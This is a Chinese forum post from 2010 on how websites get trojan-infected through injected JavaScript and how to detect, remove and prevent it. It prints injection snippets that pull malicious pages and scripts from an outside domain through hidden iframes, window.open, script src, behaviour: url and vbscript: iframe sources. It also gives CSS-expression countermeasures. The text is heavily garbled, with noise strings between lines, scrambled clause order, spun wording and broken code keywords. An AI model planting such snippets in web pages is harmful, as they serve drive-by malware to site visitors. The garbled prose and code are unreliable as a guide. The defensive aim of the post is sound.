搜索
查看: 11563|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

6 A1 x6 E! X) U8 M; B( A Q- \

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

) w5 y* g* r% h0 H; Z

IFRAME 和 JS 脚本挂马。

3 l! G ~# Z7 a) M

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

' U. v8 y. t0 p8 r

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

X" K/ J5 @8 g1 T

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

- e$ Y9 S" @6 T) j/ `5 d

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

3 |; k0 Z4 L" ^; _$ O

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

* q+ F/ S7 t& {0 ~! H# }

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

' L' S/ h# R( M( R7 Z. z

。一千多位会员的 ID

7 T( f$ c4 }* P& w1 g; Y M

2: 如何检测网页是否被挂马。

% j/ @9 `" v& ^5 q- W* ?7 J

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

" d. _8 M9 i7 J3 e; V, u8 \; }

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

+ R1 l2 C5 @" u5 x! a

因素。
2 googl 检测。>

# W- m# ~; Y% Q3 c

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

% T7 H0 j, b$ z: w- t% e

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

% f. o z/ B* c7 C& \, V9 E' [

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

" M( Y0 @0 I) N3 ~

, k7 [ }) N1 b7 `8 b

3: 如何清除网页木马。

# d9 ]+ J! x5 p7 G4 w* F

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

( S6 ^3 D' j% |4 Y7 p

入源文件把相关的网页挂马种类的可疑代码删除。

+ o) c- k8 u* K! w0 R0 v0 |6 r5 f

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

q/ } R$ f1 ^- h

悉。>

, s6 ]3 J8 B1 q* g7 H7 w. U0 j" T

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

& x3 r! X' e" X+ U* `/ f9 E; M

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

2 B/ y& m7 Y1 u/ P r

2 保证你所使用的顺序及时的更新。

+ K \5 }& ]! \& P; M8 q2 K9 K

3 不要在前台网页上加注后台管理程序登陆页面的链接。

* Q. t& |& Y; A! j. J; M- D- `' S

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

; I/ y3 b( Q- O( s4 ~* d) |( M! U

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

2 Z: n: m2 P" y3 N

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

* W: W' w. f/ c; e

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

! j8 u1 |% x1 ]

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

6 m+ R. A) O& l5 M

4 K. a3 o# M: @

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

7 G6 n7 m+ h/ b5 Z5 N" w( u7 ?, Z

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

! C n; H/ F! P4 Y4 w0 k- Y* y

JS 挂马溯源

1 @. e) W$ a& s3 h+ t& g: w

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

5 F; I- E+ p2 L- t6 m/ a

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

0 M& w+ e+ h' I/ @

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

9 i% S! ~% |8 n$ c# B5 A

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

2 O+ D; H, b( Q

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

0 y! K* {- ^2 b! P$ _5 T8 |

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

9 l/ v) i8 z2 s! g8 o8 a

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

: L! \4 M+ |# t4 m( @

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

9 Y+ ?0 K# F& D) Y9 v; H

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

+ g1 j2 e/ q0 I2 v- d" d; e

脚本在工作中会有很大的协助。

& v+ o/ V* d* d3 `2 \3 K7 y( x

挂马原理一点通

7 _7 Z8 J0 n7 Q6 s" f/ i# ^

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

}: B4 d+ r6 r" B, @' Z7 V

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

4 g! _9 n; r2 w/ {" W0 m

无从区分木马在何处。

; Z; U9 I0 g$ [% I& F% T; N( x% _

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

/ D* a( }- V; U( ~5 N/ `* O/ u" r

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

0 S* T; q: y$ I, C. _, S

容易蒙混过关,导致木马久杀不绝。

3 M8 H( z3 c7 n0 P% j4 k, e

JS 挂马攻防实录

. ~ W# W. `9 I0 z+ o( [

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

: {( k* u ]) n% R

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

1 w) d& A& O# f

这种方法使用的关键代码如下:

. v6 ^+ G( v c/ H: U

"",  window.open "http://www.v404.cn/ 木马

: ]/ p) J. e& b' ]5 X8 [

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

; u+ u" L9 y0 K

. W5 T0 B/ ?; Y: t1 N) S# c

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

; V: M: o; f$ h

但是设置为 0 后,可能会出现恶意代码不运行的情况。

% ]: k l6 q- t4 r \1 v

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

" }/ g. _/ g4 G* d

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

2 ~) j' N$ W+ z0 a% F' i

" _: ~! ^0 T3 @5 [( V. j9 V

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

' Z" K! B5 P0 R3 Z

2 h9 F, V8 d& U& B

或者

3 |* I9 A" |. H, x" _$ C1 |( e* g: @

document.writ "<div style='display:none'>"

6 Y$ S; W k8 D! H$ U( T7 L% y

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

3 k% s! H* W7 `- J5 s/ ?

document.writ "</div>"
 

' L- {+ `1 i% y! f! V

- Z* z R6 G O. ^$ v6 e

就成功地将木马挂到对方的网页中了

" y2 `: V* T9 t2 n+ x$ i

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

6 x- h% Q; ^% ?) L1 y# m

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

S2 ~$ D. F. h3 Z2 J4 h

或者:

' T e' z) ?4 ?% M

<ifram src="vbscript:[ 挂马脚本 ]">

! u: [; ^' F" @/ y

; V& \: {/ `4 z; s0 G' b+ Y( Z


等等 …

G, N( Y: U$ {; L5 _( m( X$ ^$ |% ]* |% ]6 {

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

, a& H# _' Y3 q; \

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

3 d7 ^/ w2 j/ i0 ]" w- O

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

7 F( v& X) b$ P% F+ D" _9 `

;}

/ Q2 V8 [- J8 f) }7 ]

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

6 _$ ]# A! W6 D) i* i* a

, d* ^+ g# H; e9 P0 K6 `

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

$ q# ?0 \7 G# C+ P, z

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

% z% t3 i% p- C) }# F0 M+ A5 n* z

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

" U j0 H. h# d( a

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

2 r2 U5 L3 z6 t7 n/ n, i- a. y A

<title> 让 JS 挂马中止的 CSS 代码 </title>

. U5 x4 j! u( u0 F

<styl type="text/css" id="shudoo">

6 I# X% _) s' C! w

/*<![CDATA[*/

' t0 t9 s7 {* r+ q% E' @; b) }

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

0 C3 ]/ l' f" n; c; {( l

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

9 N+ a2 i, r) d' [: A

/*]]>*/

4 ^& @- ^5 `' a

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表